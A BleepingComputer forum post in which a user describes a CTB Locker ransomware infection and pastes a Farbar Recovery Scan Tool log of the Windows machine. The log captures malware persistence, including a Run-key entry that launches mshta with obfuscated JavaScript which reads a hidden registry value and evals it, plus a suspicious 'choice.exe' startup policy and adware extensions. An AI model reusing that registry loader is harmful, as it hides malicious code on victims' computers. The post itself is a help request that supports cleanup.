Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Infected with CTB Locker


  • This topic is locked This topic is locked
4 replies to this topic

#1 Deside93

Deside93

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:11:47 PM

Posted 01 June 2015 - 03:04 PM

Hello!
My computer has been infected by CTB Locker today 1st June 2015 and I honestly do not know what to do. I know my files are cripted and the only way to unlock them is paying (and I do not want to as I don't care about my files, I've got a good backup). 
I just want to be sure I deleted the malware. 
My desktop has an image that explains the procedure I've to follow in order to pay and unlock my files (download tor browser and other things I do not understand). My personal files and photos have some strange exstensions. 

Can you please help me? 
Sorry for my english!!

 

 

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 29-05-2015
Ran by Giovanni (administrator) on GIOVANNI-HP on 01-06-2015 21:50:11
Running from C:\Users\Giovanni\Downloads
Loaded Profiles: Giovanni (Available Profiles: Giovanni)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: Italiano (Italia)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(IObit) C:\Program Files (x86)\IObit\Advanced SystemCare 8\ASCService.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(EasyBits Software AS) C:\Windows\SysWOW64\ezSharedSvcHost.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\18.7.2.3\ccsvchst.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\18.7.2.3\ccsvchst.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Hewlett-Packard Co.) C:\Program Files\HP\HP Deskjet 3050A J611 series\Bin\ScanToPCActivationApp.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
() C:\Program Files (x86)\IObit\Advanced SystemCare 8\RealTimeProtector.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Realtek Semiconductor Corp.) C:\Program Files\Realtek\RtVOsd\RtVOsdService.exe
(Realtek Semiconductor Corp.) C:\Program Files\Realtek\RtVOsd\RtVOsd.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Enigma Software Group USA, LLC.) C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe
(ThreatTrack Security, Inc.) C:\Program Files (x86)\STOPzilla\SBAMSvc.exe
(www.shadowexplorer.com) C:\Program Files (x86)\ShadowExplorer\sesvc.exe
(Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe
(Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc2.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM-x32\...\Run: [**e7921432<*>] => mshta javascript:QYVy9thhg="Uk6";i1j9=new%20ActiveXObject("WScript.Shell");S8psbceX="Yoa299EH";YsQE36=i1j9.RegRead("HKLM\\software\\Wow6432Node\\82df414c\\31a74d1c");PFDgEA0DA="xpr";eval(YsQE36);gemCD (the data entry has 15 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM-x32\...\RunOnce: [Malwarebytes Anti-Malware (cleanup)] => C:\ProgramData\Malwarebytes\Malwarebytes Anti-Malware\mbamdor.exe [54072 2015-04-14] (Malwarebytes Corporation)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1
HKU\S-1-5-21-2758695802-2872600399-379456914-1000\...\Policies\Explorer: [Run] "C:\Users\Giovanni\AppData\Roaming\Microsoft\Windows\IEUpdate\choice.exe"
HKU\S-1-5-21-2758695802-2872600399-379456914-1000\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
HKU\S-1-5-18\...\RunOnce: [SPReview] => C:\Windows\System32\SPReview\SPReview.exe [301568 2015-02-19] (Microsoft Corporation)
Startup: C:\Users\Giovanni\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2014-12-15]
ShortcutTarget: Dropbox.lnk -> C:\Users\Giovanni\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Giovanni\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll [2015-02-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Giovanni\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll [2015-02-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Giovanni\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll [2015-02-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Giovanni\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll [2015-02-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Giovanni\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll [2015-02-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Giovanni\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll [2015-02-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Giovanni\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll [2015-02-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Giovanni\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll [2015-02-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2015-04-14] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2015-04-14] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2015-04-14] (Microsoft Corporation)
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-2758695802-2872600399-379456914-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{b2753f75-9f16-43f8-a6aa-560f7f38d639} <======= ATTENTION (Policy restriction on IP)
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-2758695802-2872600399-379456914-1000\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM -> {1CC05D02-EAD9-4ECB-9E41-535AF217CE33} URL = http://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM -> {44B3BCE6-270C-4C78-94C7-8D53230EED78} URL = http://it.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM -> {5394E963-980B-42BC-8D8A-ED5CCE801142} URL = http://it.search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> {1CC05D02-EAD9-4ECB-9E41-535AF217CE33} URL = http://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {44B3BCE6-270C-4C78-94C7-8D53230EED78} URL = http://it.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM-x32 -> {5394E963-980B-42BC-8D8A-ED5CCE801142} URL = http://it.search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKU\S-1-5-21-2758695802-2872600399-379456914-1000 -> DefaultScope {1CC05D02-EAD9-4ECB-9E41-535AF217CE33} URL = http://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-2758695802-2872600399-379456914-1000 -> {1CC05D02-EAD9-4ECB-9E41-535AF217CE33} URL = http://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-2758695802-2872600399-379456914-1000 -> {44B3BCE6-270C-4C78-94C7-8D53230EED78} URL = http://it.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKU\S-1-5-21-2758695802-2872600399-379456914-1000 -> {5394E963-980B-42BC-8D8A-ED5CCE801142} URL = http://it.search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2015-03-10] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\URLREDIR.DLL [2015-04-14] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2015-04-14] (Microsoft Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll [2015-03-04] (Microsoft Corporation)
BHO-x32: Symantec NCO BHO -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Internet Security\Engine\18.7.2.3\coIEPlg.dll [2012-06-07] (Symantec Corporation)
BHO-x32: Symantec Intrusion Prevention -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton Internet Security\Engine\18.7.2.3\IPS\IPSBHO.DLL [2011-03-31] (Symantec Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2014-12-11] (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL [2015-04-14] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2015-04-14] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2014-12-11] (Oracle Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2013-08-28] (Hewlett-Packard)
Toolbar: HKU\S-1-5-21-2758695802-2872600399-379456914-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-16] (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-16] (Microsoft Corporation)
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2015-02-03] (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
 
FireFox:
========
FF ProfilePath: C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default
FF Homepage: hxxp://www.google.com/
FF SelectedSearchEngine: mystartsearch
FF DefaultSearchEngine: mystartsearch
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_17_0_0_169.dll [2015-04-15] ()
FF Plugin: @java.com/DTPlugin,version=1.6.0_45 -> C:\Windows\system32\npdeployJava1.dll [2014-12-11] (Sun Microsystems, Inc.)
FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll [2014-12-11] (Sun Microsystems, Inc.)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-16] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_17_0_0_169.dll [2015-04-15] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw.dll [2010-05-05] (Adobe Systems, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-02-21] ()
FF Plugin-x32: @java.com/DTPlugin,version=10.72.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-12-11] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.72.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2014-12-11] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-02-17] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-15] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2014-12-01] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8117.0416 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-04-16] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.27.5\npGoogleUpdate3.dll [2015-05-17] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.27.5\npGoogleUpdate3.dll [2015-05-17] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-02-05] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll [2013-05-08] (Adobe Systems Inc.)
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\mystartsearch.xml [2015-04-27]
FF Extension: Ads Removal - C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\Extensions\adremoveext@adremoveext.net [2014-11-29]
FF Extension: Microsoft Default Manager - C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\Extensions\DefaultManager@Microsoft [2014-07-01]
FF Extension: Advanced SystemCare Surfing Protection - C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\Extensions\iobitascsurfingprotection@iobit.com [2014-11-29]
FF Extension: ExstraCooupono - C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\Extensions\ZAXde@7.com [2015-05-08]
FF Extension: MsxmlIsland - C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\Extensions\{37785233-93AF-883B-AF47-11A5FE69E9A5} [2015-06-01]
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_18.0.0.128\IPSFF
FF Extension: Symantec Intrusion Prevention - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_18.0.0.128\IPSFF [2014-06-17]
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_18.0.0.128\coFFPlgn_2011_7_13_2
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_18.0.0.128\coFFPlgn_2011_7_13_2 [2015-06-01]
FF HKLM-x32\...\Firefox\Extensions: [sweetsearch@gmail.com] - C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\extensions\sweetsearch@gmail.com
FF HKU\S-1-5-21-2758695802-2872600399-379456914-1000\...\Firefox\Extensions: [{e4f94d1e-2f53-401e-8885-681602c0ddd8}] - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi
FF Extension: McAfee Security Scan Plus - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi [2014-04-04]
 
Chrome: 
=======
CHR dev: Chrome dev build detected! <======= ATTENTION
CHR Profile: C:\Users\Giovanni\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (YouTube) - C:\Users\Giovanni\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2009-01-01]
CHR Extension: (Google Search) - C:\Users\Giovanni\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2009-01-01]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Giovanni\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-05-15]
CHR Extension: (Google Wallet) - C:\Users\Giovanni\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-04-30]
CHR Extension: (Gmail) - C:\Users\Giovanni\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2009-01-01]
CHR HKLM-x32\...\Chrome\Extension: [bopakagnckmlgajfccecajhnimjiiedh] - http://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AdvancedSystemCareService8; C:\Program Files (x86)\IObit\Advanced SystemCare 8\ASCService.exe [814880 2015-04-03] (IObit)
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2736824 2015-04-07] (Microsoft Corporation)
R2 ezSharedSvc; C:\Windows\SysWOW64\ezSharedSvcHost.exe [514232 2010-04-23] (EasyBits Software AS) [File not signed]
R2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [118048 2015-05-27] (Elex do Brasil Participações Ltda)
S4 LightScribeService; C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2010-05-19] (Hewlett-Packard Company) [File not signed]
S2 LiveUpdateSvc; C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe [2585408 2015-04-02] (IObit)
S4 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [289256 2014-04-09] (McAfee, Inc.)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23816 2015-04-30] (Microsoft Corporation)
R2 NIS; C:\Program Files (x86)\Norton Internet Security\Engine\18.7.2.3\ccSvcHst.exe [130008 2011-04-17] (Symantec Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [366544 2015-04-30] (Microsoft Corporation)
S4 NOBU; C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [2804568 2010-06-01] (Symantec Corporation)
R3 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [290520 2014-12-11] (Realtek Semiconductor)
R2 RtVOsdService; C:\Program Files\Realtek\RtVOsd\RtVOsdService.exe [315392 2010-06-17] (Realtek Semiconductor Corp.) [File not signed]
R3 SBAMSvc; C:\Program Files (x86)\STOPzilla\SBAMSvc.exe [3937472 2014-01-07] (ThreatTrack Security, Inc.)
R2 sesvc; C:\Program Files (x86)\ShadowExplorer\sesvc.exe [9216 2013-01-02] (www.shadowexplorer.com) [File not signed]
R2 SpyHunter 4 Service; C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe [1026432 2015-06-01] (Enigma Software Group USA, LLC.)
S2 sz7; C:\Program Files (x86)\STOPzilla\SZServer.exe [1592624 2015-04-06] (iS3, Inc.)
S2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
S4 GameConsoleService; No ImagePath
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation)
R1 BHDrvx64; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_18.0.0.128\Definitions\BASHDefs\20140718.001\BHDrvx64.sys [1530160 2014-06-06] (Symantec Corporation)
R1 cnnctfy3; C:\Windows\System32\DRIVERS\cnnctfy3.sys [35352 2014-06-16] (Connectify)
R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283064 2009-01-01] (Disc Soft Ltd)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [486192 2014-06-16] (Symantec Corporation)
S3 EsgScanner; C:\Windows\System32\DRIVERS\EsgScanner.sys [22704 2015-06-01] ()
R3 gfiark; C:\Windows\System32\drivers\gfiark.sys [41032 2013-05-23] (ThreatTrack Security)
R3 gfiutil; C:\Windows\System32\drivers\gfiutil.sys [31264 2013-09-04] (ThreatTrack Security)
R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [26528 2015-05-06] (REALiX™)
R1 IDSVia64; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_18.0.0.128\Definitions\IPSDefs\20140731.001\IDSvia64.sys [525016 2014-06-16] (Symantec Corporation)
R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [260856 2015-05-27] (Elex do Brasil Participações Ltda)
S3 iSafeKrnlBoot; C:\Windows\System32\DRIVERS\iSafeKrnlBoot.sys [53568 2015-05-27] (Elex do Brasil Participações Ltda)
R1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [108616 2015-05-27] (Elex do Brasil Participações Ltda)
R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [50944 2015-05-27] (Elex do Brasil Participações Ltda)
R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [102416 2015-05-27] (Elex do Brasil Participações Ltda)
R1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2015-04-17] (Elex do Brasil Participações Ltda)
U0 jbhqfl; C:\Windows\System32\drivers\bdpb.sys [79064 2015-06-01] (Malwarebytes Corporation)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [280376 2015-03-04] (Microsoft Corporation)
